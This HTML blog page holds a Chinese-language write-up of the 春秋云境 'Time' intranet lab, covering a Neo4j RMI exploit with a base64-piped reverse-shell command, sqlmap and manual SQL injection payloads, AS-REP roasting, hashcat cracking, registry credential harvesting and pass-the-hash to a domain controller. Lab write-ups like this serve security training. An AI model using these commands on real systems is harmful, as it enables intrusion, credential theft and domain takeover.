

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suuuu">
  <meta name="keywords" content="blog">
  
    <meta name="description" content="fscan扫一波发现开放了7687端口，这个端口还挺少见发现是neo4j服务https:&#x2F;&#x2F;www.cnblogs.com&#x2F;Kawakaze777&#x2F;p&#x2F;18153842搜索到有关Neo4j相关漏洞，需要开启1337端口发现是开着的，打成功的概率还挺高先打一波试试，不行就只能去爆破22端口，或者再做一次全端口扫描看看是否有遗漏java -jar rhino_gadget.jar rmi:&#x2F;&#x2F; &amp;qu">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云境-Time">
<meta property="og:url" content="https://www.susec.xyz/2025/04/04/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-Time/index.html">
<meta property="og:site_name" content="suuuu&#39;s blog">
<meta property="og:description" content="fscan扫一波发现开放了7687端口，这个端口还挺少见发现是neo4j服务https:&#x2F;&#x2F;www.cnblogs.com&#x2F;Kawakaze777&#x2F;p&#x2F;18153842搜索到有关Neo4j相关漏洞，需要开启1337端口发现是开着的，打成功的概率还挺高先打一波试试，不行就只能去爆破22端口，或者再做一次全端口扫描看看是否有遗漏java -jar rhino_gadget.jar rmi:&#x2F;&#x2F; &amp;qu">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111451036.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111538970.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111924652.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223112515234.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223112551913.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223112859542.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223113101702.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223151516948.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223153629988.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223151122640.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224154544920.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224155817691.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224155836207.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224163402637.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224163649408.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110225561.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110612486.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110810243.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110958695.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310111236325.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310111347209.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113249299.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113451334.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113510830.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113824373.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310140739312.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310141652632.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310143044532.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310143643020.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310144924595.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310145426196.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310145612360.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310160527760.png">
<meta property="article:published_time" content="2025-04-03T16:00:02.000Z">
<meta property="article:modified_time" content="2025-04-07T02:08:39.490Z">
<meta property="article:author" content="suuuu">
<meta property="article:tag" content="打靶">
<meta property="article:tag" content="内网">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111451036.png">
  
  
  
  <title>春秋云境-Time - suuuu&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.susec.xyz","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"A3t4PtWLmbagcqhmt5hLbHws-MdYXbMMI","app_key":"HVBQatbtbgezZh05pZTT4NW5","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suuuu</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/BlackRoses.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="春秋云境-Time"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-04-04 00:00" pubdate>
          2025年4月4日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          987 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">春秋云境-Time</h1>
            
            
              <div class="markdown-body">
                
                <p>fscan扫一波<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111451036.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>发现开放了7687端口，这个端口还挺少见<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111538970.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>发现是neo4j服务<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Kawakaze777/p/18153842">https://www.cnblogs.com/Kawakaze777/p/18153842</a><br>搜索到有关Neo4j相关漏洞，需要开启1337端口<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223111924652.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>发现是开着的，打成功的概率还挺高<br>先打一波试试，不行就只能去爆破22端口，或者再做一次全端口扫描看看是否有遗漏<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223112515234.png" srcset="/img/loading.gif" lazyload alt="image.png"><br><code>java -jar rhino_gadget.jar rmi:// &quot;bash -c &#123;echo,&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</code><br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223112551913.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>成功，这里注意要用java1.8，大于java9会缺少类，从而打失败<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223112859542.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>找到flag1<br>我们再做做信息收集，因为flag也读了，linux提权手法比较有限，没必要的话这里就先不提权<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223113101702.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>得到内网网段是172.22.6.36<br>先上传fscan扫一波<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223151516948.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>Ping出来是包括本机有四台，这里进行一下整理<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223153629988.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>我们通过venom进行代理<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250223151122640.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>先看看web服务<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224154544920.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>发现是个登录框，第一反应是爆破一下弱口令，弱口令不成功（这里yakit最好也设置一下代理）<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224155817691.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>但是发现万能密码会有不一样的结果<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224155836207.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>但是又登不进去，只是会有个弹框，于是就在这测试sql注入，靶场的话无需考虑，sqlmap一把梭<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224163402637.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>耗时超久，这里吧payload复制出来，有耐心的可以自己打</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">Parameter: #<span class="hljs-number">1</span>* ((custom) POST)<br>    <span class="hljs-keyword">Type</span>: <span class="hljs-type">time</span>-based blind<br>    Title: MySQL &gt;= <span class="hljs-number">5.0</span><span class="hljs-number">.12</span> <span class="hljs-keyword">AND</span> <span class="hljs-type">time</span>-based blind (query SLEEP)<br>    Payload: username=<span class="hljs-string">&#x27; AND (SELECT 7022 FROM (SELECT(SLEEP(5)))YvJE) AND &#x27;</span>Plo<span class="hljs-string">e&#x27;=&#x27;</span>Ploe&amp;<span class="hljs-keyword">password</span>=<span class="hljs-number">1</span><br><br>    <span class="hljs-keyword">Type</span>: <span class="hljs-keyword">UNION</span> query<br>    Title: Generic <span class="hljs-keyword">UNION</span> query (<span class="hljs-keyword">NULL</span>) - <span class="hljs-number">3</span> <span class="hljs-keyword">columns</span><br>    Payload: username=<span class="hljs-string">&#x27; UNION ALL SELECT NULL,CONCAT(0x716a706a71,0x766a7654666358706e6c4a774146704b554275475342437566576f61465352534258476969567747,0x71716a7171),NULL-- -&amp;password=1</span><br></code></pre></td></tr></table></figure>
<p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250224163649408.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>爆完库名到表名<br>limit 0,1时爆出来的是oa_admin，应该是管理员账号密码，等下再看<br>1，1爆出flag表<br>%27+UNION+SELECT+1%2Ctable_name%2C3+FROM+information_schema.tables+WHERE+table_schema%3D%27oa_db%27LIMIT+1,1–+-<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110225561.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>读取一下列名<br>%27+UNION+SELECT+1%2CGROUP_CONCAT%28column_name%29%2C3+FROM+information_schema.columns+WHERE+table_name%3D%27oa_f1Agggg%27–+-<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110612486.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>读取数据<br>%27+UNION+SELECT+NULL%2Cflag02%2CNULL+FROM+oa_f1Agggg+LIMIT+0%2C1–+-<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110810243.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>成功<br>再回去读一下oa_admin<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310110958695.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>拿到管理员账号密码<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310111236325.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>administrator&#x2F;bo2y8kAL3HnXUiQo<br>但是还是登不进去啊，我猜是不是还有别的表<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310111347209.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>oa_users，这里可能有喷洒的数据<br>%27+UNION+SELECT+NULL%2C%28SELECT+GROUP_CONCAT%28email+SEPARATOR+%27%5Cn%27%29+FROM+%28SELECT+%2A+FROM+oa_users+LIMIT+50+OFFSET+0%29tmp%29%2CNULL–+-<br>可以通过这个指令读取，我看了里面一共500个账户，我把email，username，phone都弄了下来，过程繁琐，不多演示</p>
<p>其实比较主要的是email，我们尝试使用Kerberos AS-REP Roasting攻击<br>这种攻击是尝试从 Active Directory 获取不需要预身份验证的用户的加密凭证信息<br>proxychains4 -q impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile email.txt xiaorang.lab&#x2F;<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113249299.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>爆破出两个<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113451334.png" srcset="/img/loading.gif" lazyload alt="image.png"><br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113510830.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>我们可以通过hashcat去爆破出明文，耗时可能有点长，这里直接给出爆破的指令跟结果<br>hashcat -a 0 -m 18200 –force hash.txt rockyou.txt<br><a href="mailto:&#x7a;&#104;&#97;&#110;&#103;&#x78;&#105;&#110;&#64;&#120;&#x69;&#97;&#111;&#114;&#x61;&#x6e;&#x67;&#46;&#108;&#97;&#98;">&#x7a;&#104;&#97;&#110;&#103;&#x78;&#105;&#110;&#64;&#120;&#x69;&#97;&#111;&#114;&#x61;&#x6e;&#x67;&#46;&#108;&#97;&#98;</a>&#x2F;strawberry<br><a href="mailto:&#x77;&#101;&#x6e;&#x73;&#104;&#97;&#111;&#64;&#120;&#105;&#x61;&#111;&#114;&#x61;&#x6e;&#103;&#x2e;&#x6c;&#x61;&#x62;">&#x77;&#101;&#x6e;&#x73;&#104;&#97;&#111;&#64;&#120;&#105;&#x61;&#111;&#114;&#x61;&#x6e;&#103;&#x2e;&#x6c;&#x61;&#x62;</a>&#x2F;hellokitty<br>我们直接远程连接<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310113824373.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>那我们也成功拿下了域成员的主机<br>我们再做一下信息收集，只要能顺利提权或是横向到域管，基本就结束了<br>我们使用bloodhound对域信息进行整理<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310140739312.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>最后会出一个zip，我们导入查看就行<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310141652632.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>可以看到我们需要登上yuxuan这个账号，再去横<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310143044532.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>而我们点击一下又可以知道，我们这台主机是用于yuxuan的会话记录的，我们可以通过查询注册表来获取它的信息<br><code>reg query &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</code><br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310143643020.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>拿到明文密码，我们再登陆上去<br>yuxuan&#x2F;Yuxuan7QbrgZ3L<br>按道理来说，bloodhound上显示HasSIDHistory，那我们应该有着跟administrator完全一样的系统权限，但我们还是打不开administrator的文件夹，所以我们还要抓到administrator的hash<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310144924595.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>导出了，那我们可以pth登录administrator<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310145426196.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>先是拿下本机的flag<br>然后同理直接登录域控<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310145612360.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>完成<br>最后再做一下总结<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/20250310160527760.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%89%93%E9%9D%B6/" class="category-chain-item">打靶</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%89%93%E9%9D%B6/" class="print-no-link">#打靶</a>
      
        <a href="/tags/%E5%86%85%E7%BD%91/" class="print-no-link">#内网</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>春秋云境-Time</div>
      <div>https://www.susec.xyz/2025/04/04/春秋云境-Time/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suuuu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年4月4日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/04/04/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-Certify/" title="春秋云境-Certify">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">春秋云境-Certify</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/04/04/pwned-labs-AWS%20S3%20Enumeration%20Basics/" title="AWS S3 Enumeration Basics">
                        <span class="hidden-mobile">AWS S3 Enumeration Basics</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
